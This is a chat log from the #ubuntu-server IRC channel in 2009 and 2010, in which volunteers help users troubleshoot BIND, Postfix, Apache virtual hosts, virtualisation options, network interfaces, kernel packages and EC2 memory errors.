<jmarsden> artillerytx: OK, I'm off the phone...
<artillerytx> jmarsden: cool cool
<jmarsden> artillerytx: Remove the stuff you added to the named.conf file.  Then at the end of named.conf.local add a line
<jmarsden> include "/etc/bind/rndc.key";
<jmarsden> Then go around...   sudo killall named    and then    sudo service bind9 start
<artillerytx> alright done
<jmarsden> Did it help?  rndc status
<artillerytx> same error :-(
<artillerytx> should i restart bind?
<jmarsden> Yes, the killall and start should have done that, though/
<artillerytx> still not workin
<artillerytx> should i backup my hosts file and reinstall bind
<jmarsden> artillerytx: You can try it... I'm not sure what is happening that would break it, at this point.
<artillerytx> Yeah
<artillerytx> my rndc.key only has 4 lines in it
<artillerytx> is that right
<jmarsden> yes
<artillerytx> yeah i have no idea then
<artillerytx> i have a rndc.conf and a rndc.key
<jmarsden> OK, well, if you want you can back up the config files and then sudo apt-get purge bind9 bind9-utils    and then install them both and see how it goes from there.
<artillerytx> alight i really appreciate your help !
<artillerytx> if i wanted to copy a whole directory it would be cp -r /etc/bind
<artillerytx> k got it now im gonna remove bind
<artillerytx> jmarsden: looks like i don't have bind9-utils
<jmarsden> My mistake, try it without the dash.  bind9utils
<jmarsden> rndc is part of bind9utils
<artillerytx> k
<artillerytx> now i will do apt-get install bind9 bind9utils
<jmarsden> Right.  Check that /etc/bind/ is either missing or has no files in it first?
<artillerytx> it kept all my domains hosts files
<artillerytx> should i just remove that directory
<jmarsden> That's probably OK... but I'd remove it just to be sure you egt a fresh configuration.
<artillerytx> k cool
<artillerytx> alright done with that
<artillerytx> now i need to repeat those steps that you did ?
<artillerytx> great
<artillerytx> rndc is working now
<jmarsden> OK, you are all set.. just add your domains back
<artillerytx> awesome thanks
<jmarsden> No problem.
<uvirtbot> New bug: #437058 in eucalyptus (main) "Walrus registration assumes that walrus is running on the same host as the frontend" [Undecided,New] https://launchpad.net/bugs/437058
<pwnguin> kuku kaju!
<uvirtbot> New bug: #437100 in libvirt (main) "libvirt xml configuration ignores xml comments" [Undecided,New] https://launchpad.net/bugs/437100
<uvirtbot> New bug: #409777 in eucalyptus "credentials zip file should pack files with permissions 600" [Wishlist,Confirmed] https://launchpad.net/bugs/409777
<Alan> Hoping somebody can give me some advice...  basically, i have an ubuntu server (amd64, 8.10) that doesn't have hardware virtualisation support, and I want to run a second ubuntu server instance on it
<Alan> which route should I go down? vserver, xen, virtualbox, or something else?
<hexa-> Hey
<hexa-> so i want to do some logfile evaluation for my webserver
<hexa-> is there a way i can use grep/sed or something like this for creating a statistic for user agents?
<hexa-> counting requests per user-agent
<hexa-> the user-agent is usually last in the webservers access.log entangled by double quotes
<Deeps> cat access.log | awk -F'"' '{print $(NF-1)}' | sort -u
<Deeps> will list you all the unique UA's you have
<Deeps> sorted alphabetically
<hexa-> wow, nice
<hexa-> thank, I think I get it from here
<th3_b0b> Hey guys. I just set up a new Jaunty Server as a Gateway as described in this (https://help.ubuntu.com/community/Internet/ConnectionSharing) tutorial. Then I installed the openssh-server and can perfectly login using "ssh IP-OF-SERVER". But if I try "ssh HOSTNAME-OF-SERVER" all I get is: "ssh: connect to host samwise port 22: Connection refused". What's wrong here?
<th3_b0b> I guess it has something to do with the iptables rules decribed in the gateway-howto, but I'm not very familiar with iptables so I know neither if iptables actually causes the problem nor how I could solve it...
<ScottK> If it works with the IP address, but not the hostname, look at DNS, not iptables.
<th3_b0b> ScottK: Any hint as to where I should look? On the client side, DNS seems to work flawlessly. Resolving the server's hostname works. And on the server side, the hostname is configured correctly (or at least, so I would think...).
<ScottK> Not really.
<th3_b0b> I just noticed that I can ping the server using it's histname, but cannot ping the client from the server using the client's hostname
<Alan> crap... does ubuntu server not actually have any decent virtualisation support?
<Alan> Seems every option involves raping my kernel, which i'd like to avoid doing because i'm running software RAID5....
<andol> Alan: KVM?
<Alan> andol: ok, let me refine to "non-hardware-virtualisation"
<Alan> my CPU is too old to have virt exts
<Alan> it seems that support for everything else has been dropped though
<Alan> well, xen and vserver anyway
<Alan> and virtualbox is being spazzy, but  taht might be my only option...
<VK7HSE> On my IBM eserver 220 I have to over ride the default in grub as kernel 2.6.31-11-generic #36-Ubuntu SMP Fri Sep 25 06:37:51 UTC 2009 i686 GNU/Linux will not detect the ServeRAID 4LX card unless ACPI is set to disable... however on the 2.6.28-15-server kernel this was not necessary ... any clues as to why this might be happening? I mean I would have thought that ACPI standard wouldn't have changed?
<KSid> Hi guys
<KSid> If I want to install Intrepid server onto a VirtualPC instance
<KSid> Should I use "Minimum System" or "Minumum Virtual Machine"
<KSid> I think minimum vm is for VMWare but am not too sure
<VK7HSE> KSid: are you referring to the kernel used ?
<KSid> Well, I just want to setup a local ubuntu server but am short on disk space. I've noticed hitting F4 gives me those two install options as well as a "Normal" install
<KSid> Did a little background reading and those options seem to be similar to how my VPS is set up but am not sure which of those two to pick
<VK7HSE> Oh ok... I thought you were referring to the kernel to be used! ... not sure what would be best...
<KSid> VK7HSE: No probs, thanks for trying though!
<KSid> I'm going for minimal system over vm because I can't find anything that suggest the minimal vm is optimised for anything other than VMWare
<KSid> or KVM
<VK7HSE> I'm still scratching my head over this ACPI issue! and that the ubuntu server kernel has no installation candidate! ... Gahh! maybe I should go to bed!...
<VK7HSE> yet on another karmic system here (desktop) I can install the sever kernel via synaptic! ...  :-/
 * VK7HSE back in 6-8 hours! ..
<domas> hi! what is correct way of obtaining apache core dumps in ubuntu? :)
<domas> probably needs a module...
 * domas hacks
<silverhead> Hi!
<silverhead> Does anyone know how to use a fs different from ext3 with ubuntu-vmbuilder?
<maxagaz> do i need to install a pxe to use ltsp ?
<giovani> maxagaz: PXE is a client-side concept, you don't install it
<giovani> PXE booting typically requires a DHCP server, and a TFTP server
<maxagaz> giovani, ok
<maxagaz> giovani, i tried to install ltsp but i didn't know i had to run ltsp-build-client
<maxagaz> giovani, but there's something i'm wondering about
<maxagaz> if i have to ltsp server, how the thin client will know which one it should use ?
<centaur5> maxagaz: You have multiple DHCP servers? Is that what you're saying?
<maxagaz> centaur5, i don't, but i'd like to understand a thin client knows on which machine to boot
<poisonbit> hello
<poisonbit> sorry for my english
<poisonbit> is there any graphical interface for preseed file creation ?
<poisonbit> and management... like fwbuilder, but for preseed
<poisonbit> months ago, i saw a .js application, for generate virt machines "command line". Could be cool, something similar but for preseed
<poisonbit> also both applications may be used in parallel (a new virt. machine + its preseed file for delpoyment)
<poisonbit> deployment
 * genii sips and reads https://help.ubuntu.com/9.04/installation-guide/i386/preseed-using.html
<centaur5> maxagaz: You set in the global properties of the DHCP server to boot from the location of your PXE file.
<Jad> hi. as ubuntu server offers cloud computing, can a virtual machine span accross several ubuntu servers?
<Jad> so that some processes run on one ubuntu server while other processes run on other ubuntu servers
<domas> thats good understanding of cloud computing, definitely
<Jad> really?
<domas> no, not really
<Jad> :P
<Jad> i know what cloud computing is, the thing with is it has different applications of different vendors
<Jad> azure has cloud computing but it has the ability to span workload on multiple pcs
<Jad> while cloud computing of ubuntu maybe different
<Jad> if i network connect several ubuntu servers, what applications that can run on ubuntu support clouding?
<Jad> or simply, is the cloud computing method of ubuntu similar to azure cloud computing model?
<Jad> the website doesn't explain much about the cloud model of ubuntu
<Jad> http://www.ubuntu.com/products/whatisubuntu/serveredition/cloud
<ghostlines> everytime I mount an external ntfs drive, the ownership gets automatically changed to root
<ghostlines> I then try and change the ownership, the terminal takes a while to do this operation and when it's done the ownership is still set to root
<domas> where did bigloo go from ubuntu
<domas> damn
<albatross> Hello. I'm new to linuxservers and I've got some trouble with outgoing mail after tampering with the mailserver-settings. Does anyone know how to go back to the default settings without doing a reinstallation of the entire server. Perhaps just removing the mailserver and installing again?
<albatross> Or for that matter, does anyone know a good guide for troubleshooting?
<guntbert> albatross: mail servers can be difficult beasts - you could remove it completely with sudo aptitude  purge <package> (I guess postfix)
<albatross> guntbert, actually i've tried that..
<albatross> did nothing good...
<ScottK> sudo dpkg-reconfigure [packagename]
<albatross> will try that. thanks.
<albatross> If it does not work, is there any way to "trace the mail" to se where it goes wrong?
<ScottK> What mail server package are you using?
<guntbert> albatross: in any case there should be log files /var/log/mail...
<albatross> the one you get when you choose mailserver at install. postfix i belive.
<ScottK> Then /var/log/mail.log will have all the details.  Postfix is very meticulous about logging.
<albatross> tried following this guide and it all went up in smoke. http://flurdy.com/docs/postfix/
<albatross> ok. will take a look
<ScottK> albatross: Which Ubuntu release are you using?
<albatross> 9.04
<albatross> this is the log
<albatross> http://pastebin.com/m6a5e137e
<albatross> I see the error, but do not know how to fix it.
<ScottK> albatross: I recommend using https://help.ubuntu.com/9.04/serverguide/C/email-services.html as it's written with Ubuntu developers.
 * ScottK looks
<albatross> tnx
<ScottK> Why are you trying to send mail to example.com?
<albatross> Is that what is going on.. I'm not, as far as i know..
<albatross> Seems I need to check the mailscript..
<albatross> hmm..
<ScottK> That's what the log says.
<albatross> And that was right. What a miss.. Did not fix the script before testing.
<albatross> Didn't work when fixed, but after  sudo dpkg-reconfigure postfix did the trick
<albatross> Can I bother to ask what that command does? dpkg?
<guntbert> !apt | albatross
<ubottu> albatross: APT is the Advanced Package Tool, which together with dpkg forms the basic Ubuntu package management toolkit. Short apt-get manual: https://help.ubuntu.com/community/AptGetHowto - Also see !Synaptic (Gnome), !Adept (KDE) or !KPackageKit (KDE)
<ScottK> man dpkg-reconfigure should have details.
<albatross> Thank you for your help!
<iclebyte> i am having the most horrific experience with apache on ubuntu-server. I have 'NameVirtualHost *' defined in 000-default in sites-enabled. I have decrescent.com defined which works however my entry of dev.decrescent.com keeps reverting to the default virtual host. my dns is correct. could someone look at my dev.decrescent.com virtual host definition? http://pastebin.ca/1580713
<poisonbit> iclebyte, have you try to use  <VirtualHost *:80>  and to eliminate that unuseful alias (your ServerName is equal to your ServerAlias)
<poisonbit> ?
<poisonbit> for use *, i put NameVirtualHost      *:80
<poisonbit> and then  <VirtualHost *:80> ServerName foo.tld   ServerAlias  www.foo.tld </VirtualHost>
<poisonbit> and have to do the same for :443
#ubuntu-server 2009-09-27
<diegoviola> hi, i'm installing ubuntu server, and i want to add some stuff to it, like my own packages, software, etc, is there a way i can rebuild that system as a iso file to install it later on other machines?
<bitprophet> diegoviola: I don't know how to create custom installer ISOs, but you might want to look into "preseed" or "preseeding"
<bitprophet> it's essentially a config file for the installer, so you drop the seed file (just a text file) on a web server or onto a custom ISO, and can point any installer to it. then it will follow your seed file, which could tell it to automatically install certain packages / settings / etc
<bitprophet> I use it mostly to automate installs, but it's very flexible.
<Alan> Might ask this question again, since there seems to be a different set of people alive here...
<Alan> Home server virtualisation, no hardware virt exts - is there a better option than VBoxHeadless?
<incentifit> Is it possible to run vnc4server on headless ubuntu 9.04 server?
<Debolaz> Is there a good CD image availabel for making images of a harddrive and upload it to a remote server?
<Bryan_Sierra> I'm trying to connect to a WPA secured AP, and I can't get the wireless card to connect. I'm using ndiswrapper for the driver and wpa_supplicant to connect.
<Bryan_Sierra> Any help?
<Bryan_Sierra> it keeps timing out
<Bryan_Sierra> Anyone got any ideas at all?
<ScottK> !weekend Bryan_Sierra
<ubottu> Error: I am only a bot, please don't think I'm intelligent :)
<ScottK> !weekend | Bryan_Sierra
<ubottu> Bryan_Sierra: It's a weekend.  Often on weekends, the paid developers, and a lot of the community, may not be around to answer your question.  Please be patient, wait longer than you normally would, or try again during the working week.
<Bryan_Sierra> Ah
<bastid_raZor> using ubuntu desktop but i figured this channel would be more helpful. any guides on using bind9 to set DNS? i have a dynamic IP which changes at least twice a day.
<Jagged> bastid_raZor: are you trying to run a DNS server for your network, or update your domain name with your dynamic IP?
<bastid_raZor> Jagged: i'm trying to get the outside world to be able to find me with youfoundme.com .. i have apache hosting a few things.
<bastid_raZor> i currently have dyndns setting me a visible DNS to the world but i have to manually update it when my ip changes
<Jagged> I think theres a bash script you can run as a cron job to update dyndns
<Jagged> some broadband routers also support dyndns
<qman__> yeah
<qman__> bind is not what you need
<bastid_raZor> i have an outdated D-Link DI604 .. it does have an option about setting something for dns.
<qman__> the router would have to support dyndns explicitly
<qman__> not to be confused with your preferred DNS server
<Jagged> http://foertsch.name/DynDNS/ first hit on google
<Jagged> looks promising
<Jagged> http://www.dyndns.com/support/clients/unix.html dynDNS also appears to have a perl scritp
<Jagged> *script
<Jagged> setup the perl script to run on a cron job every few hours and you should be allright
<bastid_raZor> nice, thanks for the clarification on what i needed.
<bastid_raZor> seems i'll be needing to run ddclient as a dameon since i'll need to use the checkip option. very nice guys. thanks Jagged qman__
<seyDoggy> anyone have a trusted supplier of 1u rack enclosures?
<Jagged> AIC
<Jagged> http://www.aicipc.com/
<Jagged> Or did you mean supplier as in reseller?
<seyDoggy> Jagged: either, just want a place I can order 1
<Jagged> I don't know if AIC will do individual sales =\
<Jagged> Might want to try Ingram Micro, Newark, or Arrow
<seyDoggy> Jagged: tnx. checking them out now
<Jagged> Synnex is another reseller house as well.
<seyDoggy> found lots of selection for 1u server cases at newegg. good prices too
<Jagged> Newegg is a good consumer shop
<uvirtbot> New bug: #437473 in qemu-kvm (main) "Stock Ubuntu KVM ignores guest synchronous fileIO requests " [Undecided,New] https://launchpad.net/bugs/437473
<Bryan_Sierra> Does anyone know of a command line way of having a server automatically connect to a WPA encrypted AP?
<Bryan_Sierra> (at start up, without having to have a user login and connect)
<Bryan_Sierra> Ah, nevermind; managed to find it >_>
<dragonlyre> hi, I was wondering if anyone uses the server as an iso invbox?
<dragonlyre> in vbox*
<SpaT> i thought that if I did an ifconfig ethN down that it would bring the interface down and deassociate the IP
<SpaT> however when I ping or ssh to the adress from the machine it was on I still works
<pipedream> uhm
<pipedream> SpaT: ifconfig -a will show it
<SpaT> yes i know
<pipedream> good question
<SpaT> pipedream: normaly I supose its not such a big deal but i use one server as failover for the other. when switching back i noticed that postfix would not send mail to the real server because it was delivering to itself...
<pipedream> ah
<SpaT> so any id how I am supose to bring it down properly?
<SpaT> idea*
<pipedream> this seems to work
<pipedream> ip address del 10.0.0.1 dev wlan0
<pipedream> Warning: Executing wildcard deletion to stay compatible with old scripts. Explicitly specify the prefix length (10.0.0.1/32) to avoid this warning. This special behaviour is likely to disappear in further releases, fix your scripts!
<pipedream> despite the warning
<pipedream> oh, I'm supposed to use the mask
<SpaT> thanks
<pipedream> root@osprey:~#ip address del 10.0.0.1/255.0.0.0 dev wlan0
<pipedream>  /32 doesn't work
<SpaT> thats odd
<pipedream> SpaT: thanks to you, I didn't know that!
<pipedream> found it here: http://www.cyberciti.biz/faq/howto-configuring-network-interface-cards-on-debian/
<pipedream> didn't explain it right, just showed me the new "ip" (not ifconfig) syntax
<SpaT> pipedream: well in your case /8 should have worked
<SpaT> yeah i just read it. it also suggests that ifconfig would remove the ip
<SpaT> pipedream: I gtg thanks again for the help
<ryan8403> hi, can anyone advise on the proper entries in my /etc/resolv.conf for a caching dns server?
<alex_joni> http://langfeldt.net/DNS-HOWTO/BIND-9/DNS-HOWTO-3.html
<ryan8403> alex_joni, thanks, i noticed i didn't read through that far enough.
<ryan8403> any suggestions/reasons why it wouldn't be sending queries to the forwarders? (i'm using opendns servers + isp as forwarder addresses)
<ryan8403> instead it seems to go straight to root
<alex_joni> did you maybe use dig +trace ?
<ryan8403> no, just a simple 'dig google.com'
<ryan8403> returns info for google
<ryan8403> but then gives all the root servers under authority section
<alex_joni> I get this:
<alex_joni> ;; AUTHORITY SECTION:
<alex_joni> google.com.             328684  IN      NS      ns1.google.com.
<alex_joni> ryan8403: did you put the DNS ip's in /etc/bind/named.conf.options under forwarders ?
<ryan8403> yes
<ryan8403> http://pastebin.com/d318f421d
<alex_joni> maybe this is of some help: http://www.howtoforge.com/installing-an-ubuntu8.04-dns-server-with-bind-p4
<ryan8403> thats what i get
<ryan8403> alex_joni, thank you its rather late for me
<ryan8403> and i think my google fu skills are weak
<ryan8403> *kung-fu
<poisonbit> I've always used Debian for my corporate firewalls (9), but i also've some gentoo legacy firewalls from other administrators
<poisonbit> I am planning to migrate the internal network (ldap servers, web, ddbb, email, dns, subversion, ntp, memcached, dhcp, samba, nfs, jabber, etc) to ubuntu server 8.04.
<poisonbit> I'm evaluating if it should also migrate the 9 firewalls, because they really work well, but some are still with etch (oldstable in Debian).
<poisonbit> It is a complex network, segmented into vlans, tunneled between all extremes, bridged over multiple active instances of openvpn. With ebtables, routing tables, filtering, traffic control, manageable switches, multiple public ranges in several ISPs, fiber between offices, etc..
<poisonbit> My /etc/network/interfaces in Debian use to be very complicated and long, (adding bonding and many DMZ's of the above), and full of ifup / down hacks.
<poisonbit> Ubuntu server is recommended for this kind of firewalls and ... Do it happen to be free from "2.0" things like the desktop "network-manager"?
<poisonbit> Also, where can i read about security management (as in project, not as in operative system) in ubuntu server ?
<poisonbit> errr  hello.  :-P
<poisonbit> well, it seems it is file based, so i suppose it doen't has network-manager installed and activated by default
<poisonbit> https://help.ubuntu.com/8.04/serverguide/C/network-configuration.html
 * poisonbit searchs security in the wiki and find: https://blueprints.launchpad.net/ubuntu/+spec/server-security
<alex_joni> poisonbit: 10.04 will be a new LTS.. maybe it would be less of a pain to jump directly to that
<poisonbit> sorry, when is scheduled ?
<alex_joni> 10.04 = 2010 april
<alex_joni> 8.04 = 2008 april
<poisonbit> cool
<alex_joni> not that far away
<poisonbit> i've a lot of things to do first in other servers, i can wait
<alex_joni> don't get me wrong.. I'm suing 8.04 on my servers
<alex_joni> and it's great
<poisonbit> now i'm documenting the project
<poisonbit> server 8.04 has support to 2013, right ?
<poisonbit> or was 2011 ?
<alex_joni> 11 for desktop, 2013 for server
<poisonbit> well, it's a valid option for me now, also it will help to "clean" the migrated systems, and easy the new migration when 10.04 gets supported
<poisonbit> hehe, one of the firsts steps for the late_command, for the pressed files:  purge ufw (i've my own framework)
<poisonbit> which syslog uses 8.04 by default? i'm in love with rsyslogd
<poisonbit> wow!!  (wow like in Vista)
<poisonbit> https://help.ubuntu.com/8.04/serverguide/C/jeos.html
<poisonbit> i've 3 little sunFire machines with X5560 Xeons ang 72G of ram each, conected to 15k SAS using 4G/s fiber... only for virtualization
<poisonbit> this will be fun
<poisonbit> does vmware-tools of VMware ESX 4 install clean in 8..04? or i will need hacks in my deployment scripts ?
<poisonbit> open-vm-tools appears as "outdated" in esx4
<poisonbit> https://help.ubuntu.com/8.04/serverguide/C/jeos-preparing-os.html#joes-installing-vmwaretools does not speak about versions
<maxagaz> how to make this command work ? => echo abc | tar -jcvf foo.tar.bz2
<maxagaz> it seems i should use -T - somewhere
<maxagaz> but it doesn't work
<VK7HSE> can anyone shed some light on this ??? ...  http://paste.ubuntu.com/279580/
<VK7HSE> ^^^  server kernels not installable...
<uvirtbot> VK7HSE: Error: "^^" is not a valid command.
<pmatulis> VK7HSE: what release are you using?
<pmatulis> (karmic from the kernel version)
<VK7HSE> karmic server alpha6 .. have the same on 2 servers...  currently have 2.6.31-11-generic on both...
<VK7HSE> but I get the errors above (pastebin) if I attempt to get the current server kernel, however my desktop (this PC!) I can get the server kernel via synaptic! ...
<VK7HSE> all 3 are on karmic alpha6 ... 2x server (i386) 1x desktop (amd64)
<VK7HSE> just attempted using aptitude, still the same issue so it's not an apt-get or aptitude error... this happens on both the Main server & a local mirror (Internode Australia)
<pmatulis> VK7HSE: on your pc do 'aptitude update' and then do 'aptitude search <your kernel package>'.  pastebin the output to the last command
<pmatulis> <your kernel package> == the one you want to install on your server
<VK7HSE> aptitude search linux-image-2.6.31-11-server  but there's nothing to paste... no output!
<VK7HSE> I've checked the repo and there is no kernel .deb
<VK7HSE> but it's listed in both apt-get/aptitude as being there... when you tab to get the remainder for what you're typing!
<pmatulis> b/c you didn't update your package list?
<pmatulis> did you do 'aptitude update'?
<VK7HSE> as in ... http://paste.ubuntu.com/279622/
<VK7HSE> refer to http://paste.ubuntu.com/279625/
<pmatulis> right, so it doesn't exist
<VK7HSE> exactly! that's what I'm saying ;)
<pmatulis> now do the same procedure on the server where it is supposedly installed
<pmatulis> the i386 kernel server is being phased out
<pmatulis> https://wiki.ubuntu.com/KernelTeam/Specs/KarmicKernelFlavours
<VK7HSE> well by looking through what is on the main server I can already say it's not there! ... http://archive.ubuntu.com/ubuntu/pool/main/l/linux-meta/
<VK7HSE> loking at wiki!
<VK7HSE> Ok, well both server systems are below the 4Gb in memory!
<VK7HSE> the other annoyance is that I have to set pci=noacpi to get the 4LX serveRAID card to be found! that's for 2.6.31-11-generic...
<pmatulis> i'd like to see what happens if you update and upgrade the system that has the kernel installed
<pmatulis> pmatulis will be back in a few hours
<VK7HSE> well the previus kernel was the last server kernel for jaunty...
<VK7HSE> ok!
<VK7HSE> DOH! I now realise my error...  the system I got the server kernel on is amd64! the 2 servers (that are servers) are i386 ... :-/
<VK7HSE> So in reading the fine print there is no longer an i386 server specific kernel! ...
<pmatulis> VK7HSE: 09:46 <  pmatulis> the i386 kernel server is being phased out
<albatross> Hi there! I'm learning to write shell scripts. Its working quite well, bu i want to know how to accept flags and parameters, but do not know what to google for. Any idÃ©as?
<Pici> albatross: Have you asked in #bash ? Thats the best channel for looking for such resources.
<albatross> aah
<albatross> thanks
<jpds> albatross: man getopt - should help you.
<ttx> kirkland: around ?
<uvirtbot> New bug: #437768 in eucalyptus (main) "Unable to connect to web frontend after fresh install of cluster" [Undecided,Invalid] https://launchpad.net/bugs/437768
<Bryan_Sierra> Okay, I'm trying to connect to my wpa-psk secured AP, but wpa_supplicant keeps giving me "CTRL-EVENT-DISCONNECTED" Anyone got any help on this?
<TeTeT> is there a guide for configuring an UEC 1.6 cloud on Karmic?
<svullo> I am thinking of trying out JeOS, and I was wondering if it for the best to use JeOS as base install which contains the virtual servers or if it's better to use the regular ubuntu server and run jeOS under virtual servers?
<sub> AFAIK JeOS is optimized for virtual machines, so I'm not sure that you would want to run it on physical hardware
<svullo> yeah, thats what I thought, just double checking
#ubuntu-server 2010-09-27
<sloopym> is there a channel for KVM on server? or even just KVM?
<arrrghhh> #kvm
<arrrghhh> i know, sounds crazy right?
<sloopym> wow, yeah last time a guessed a channel name it wasnt pretty :'/
<sloopym> but thanks :')
<arrrghhh> haha no worries
<osmosis> if CTRL-ALT-DEL isnt responding, are there any other hotkeys I can try?
<MalkavianManiac> osmosis, for what?
<arrrghhh> ctrl-alt-insert i think for certain vms
<arrrghhh> ctrl-alt-end i think is a rdp thing
<osmosis> MalkavianManiac, i found the sysreq reboot key
<riverty> Evening all..
<riverty> Could anyone assist me with an Apache2 / SSL question?
<talcite> hi guys, I'm looking for some debugging pointers. I've got a server that is hanging in the reboot process. It stops _right_ before halt is called and the kernel complains about it on the console. The tough part is that I don't have any ttys at that point and the logging daemons have all stopped
<talcite> does anyone have any idea how I can figure out what's holding up the server?
<ThomasB2k> Hello
<ThomasB2k> I have a question. If I change my user password on my server, will everything still work correctly end-user side?
<osmosis> any ideas on why a win2k3 kvm guest on ubuntu server works great on hardy, but runs super slow on lucid ?
<fluvvell> date
<ttx> ScottK: thanks, tag added (tag is server-mrs, stands for "maverickrelease status" and serves to generate the our Release status page)
<soren> Holy crap, glusterfs 3.1 looks awesome.
<_ruben> is that appropriate language in here ? ;)
<soren> For this sort of thing, I'm sure it is. :)
<_ruben> ok :)
<_ruben> so, what's so awesome about it? haven't looked at it in ages
<_ruben> or better yet: what do *you think* is awesome about it, in order to prevent a rtf website response ;)
<soren> Trying to find the summary... hang on.
<soren> GlusterFS has veen teh awsome since forever. Now it's being even more awesome by letting you do everything on-line.
<soren> http://www.gluster.com/community/documentation/index.php/GlusterFS_3.1beta#
<soren> Look at section 3.
<_ruben> looks pretty sweet indeed
<uvirtbot> New bug: #648604 in openldap (main) "package libldap-2.4-2 2.4.21-0ubuntu5.3 failed to install/upgrade: cannot access archive: No such file or directory" [Undecided,New] https://launchpad.net/bugs/648604
<uvirtbot> New bug: #648605 in dovecot (main) "package dovecot-common 1:1.2.12-1ubuntu5 failed to install/upgrade: Package is in a very bad inconsistent state - you should  reinstall it before attempting a removal." [Undecided,New] https://launchpad.net/bugs/648605
<uvirtbot> New bug: #648609 in samba (main) "unable to unmount broken cifs mount" [Undecided,New] https://launchpad.net/bugs/648609
<uvirtbot> New bug: #648619 in tomcat6 (main) "tomcat6 failed to purge" [Undecided,New] https://launchpad.net/bugs/648619
<crb> hi, anyone got any advice on page allocation failure errors
<crb> as per http://pastie.org/1183944
<soren> crb: Maybe you're out of swap.
<soren> crb: This is on EC2, right?
<crb> Yep
<soren> A micro instance?
<crb> nope, c1.medium
<crb> Mem:   1781976k total,  1463264k used,   318712k free,   193556k buffers
<crb> Swap:   917496k total,    60760k used,   856736k free,   439176k cached
<crb> for example
<crb> best I've found in other bug reports is bad drivers
<crb> soren: any ideas?
<erichammond> crb: Are you getting these errors on multiple instances?  Have you tried moving to a new instance in case it's a problem with the underlying host?
<crb> erichammond: Yes, I'm getting them on four instances across two AZs
<erichammond> crb: :(
<crb> they're under quite a bit of load, they're our production web servers
<crb> indications from other bugs suggest it's when the kernel can't allocate RAM for connection tracking/netfilter
<crb> it /might/ be fixed in 2.6.35, but those error reports generally relate to a specific NIC driover
<crb> also reported here: http://developer.amazonwebservices.com/connect/thread.jspa?threadID=43939
<soren> crb: You can expand the amount of space the kernel can use for nf contracking.
<erichammond> crb: What Ubuntu release?
<crb> esh:  10.04
<soren> crb: cat /proc/sys/net/netfilter/nf_conntrack_count
<soren> You really should be getting a better error message if that's the limit you're hitting, though.
<soren> (That's the current count, not the limit)
<crb> not there
<soren> *blink*
<soren> The file is missing?
<crb> I don't think thats my specific error, thats what I found in reading a similar backtrace related to madwifi
<crb> I doubt I'm running conntrack
<crb> these are just web server nodes
<soren> Ah, right, if iptables aren't loaded at all, that makes sense.
<crb> my pastie doesn't refer to conntrack, though it does refer to nf_hook_slow, nf_iterate
<crb> i'm assuming nf == netfilter
<soren> It is.
<_chris_> hej all
<_chris_> we have a small linux server here with a small hdd. we want to get a bigger hdd and move the whole installation on it, can this be done with clonezilla for example without problems ?
<qman__> _chris_, not sure if clonezilla is aimed at that sort of thing, but yes, you can simply do a disk image from one to the other
<qman__> using dd, if nothing else
<qman__> and then resizing the filesystem
<brontosaurusrex> whats the easy way to install apache h264mod?
<brontosaurusrex> streaming module that is
<qman__> brontosaurusrex, doesn't look like it's in the repositories
<qman__> I'd look for a PPA
<brontosaurusrex> qman__, ok
<qman__> failing that, if the creator of the software doesn't have a .deb download, compiling from source is the last resort
<qman__> if you have to compile though, use checkinstall or similar to create your own package, rather than just 'make install'
<qman__> to make it easy to upgrade or remove later
<brontosaurusrex> qman__, nah, i will not compile myself and there seems to be no ppa on https://launchpad.net, only for lighttpd
<uvirtbot> New bug: #648527 in clamav (main) "continuance from password changer .Bug 647912" [Undecided,New] https://launchpad.net/bugs/648527
<a_ok> What is the prefered tool to encode WAV to MP3?
<joschi> a_ok: lame
<zul> morning
<classical__> how can i view what is in zip file without unziping it ?
<joschi> classical__: `unzip -l /path/to/file.zip`
<classical__> joschi, txh
<classical__> joschi, thx*
<Seidr> Heya - you might see this question alot but I've got to ask it anyway. Are there any known issues in with Ubuntu when using ISPConfig 3 and Jailkit (version 2.12, most recent version) - as I can't for the life of me get new users to be created jailed! :(
<Seidr> I followed the Perfect Server guide for Ubuntu 10.04 guide on HowtoForge
<Seidr> The main issue I seem to be having is the shell is always set to /bin/false, not /usr/sbin/jk_chrootsh when a new user is set as Jailed
<yellabs> hello all
<Seidr2> Hi yellabs
<yellabs> what would be the option to install ubuntu server , to run on one computer and , then multi virtual machines on that pc
<Seidr> I can't say I've had a whole load of experience in running VMs on a server, but I have used VMWare in a limited capacity before
<yellabs> or in other words, the best way to use ubuntu for virtualisation
<yellabs> esx server ?
<Seidr> Someone else might be able to give you a better answer though - if anyone else is awake that is. I'm waiting for someone to answer myself
<yellabs> Seidr, and what was your question ? i might know that
<Seidr> It's regarding ISPConfing, Jailkit(2.12) and Ubuntu 10.04. I followed the Perfect Server guide on HowtoForge to the letter (including installing Jailkit BEFORE ISPConfig) yet any user I create jailed from ISPConfig has their shell set as /bin/false
<Seidr> there doesn't seem to be any interaction between ISPConfig and Jailkit at all going on in the logs
<joschi> yellabs: vmware esx is another operating system. you probably mean vmware server
<joschi> yellabs: what kind of virtualization do you want? os-level virtualization (e.g. openvz), paravirtualization (e.g. xen) or full virtualization (e.g. virtualbox, kvm, vmware server)?
<yellabs> i thought kvm would be closer to ubuntu
<yellabs>  ISPConfing, Jailkit(2.12) and Ubuntu 10.04. , thats a hard one
<Seidr> I was afraid of that - the guide calls for 2.11, however the changes between 2.11 and 2.12 are very minor so I doubt it's a compatibility issue
<Seidr> especially as I'm seeing no errors during ISPConfig setup and no errors in the auth log
<yellabs> i think you followed this tutorial ? http://howtoforge.net/perfect-server-ubuntu-10.04-lucid-lynx-ispconfig-3-p4
<Seidr> that's correct
<yellabs> and you are not the only one with the error , http://serverfault.com/questions/185012/ubuntu-10-04-pefect-server-jailkit-2-12-not-working
<yellabs> but there are few who have attempted to do it
<Seidr> Hah - uhm, that would be me :)
<yellabs> hehe
<Seidr> I'm just about to go through the process on a VM, to be sure I've not made a stupid mistake somewhere
<Seidr> (it was late at night when I setup the server, so it's entirely possible)
<ttx> SpamapS: ping
<Seidr> but I've even gone back, removed ISPConfig and made doubly sure Jailkit is installed before proceeding again, so I'm stumped
<yellabs> maybe the best thing, although it takes time, is to find out who wrote the tutorial and e-mail him / her
<Seidr> Mm - agreed - once I've gone through this VM setup and confirmed the problem I think I'll do just that.
<Seidr> Thanks for your time yellabs
<yellabs> or install it again , but using the old 2.11, as said in tutorial
<yellabs> god luck
<yellabs> good luck *
<yellabs> bye bye
<zul> hggdh: ping
<hggdh> zul: at your service, sir
<zul> hggdh: did you reproduce that dovecot bug?
<hggdh> zul: I had it happening to me while going thru a dist-upgrade on Saturday
<zul> hggdh: how did you reproduce it
<zul> did you have like proposed enable as well?
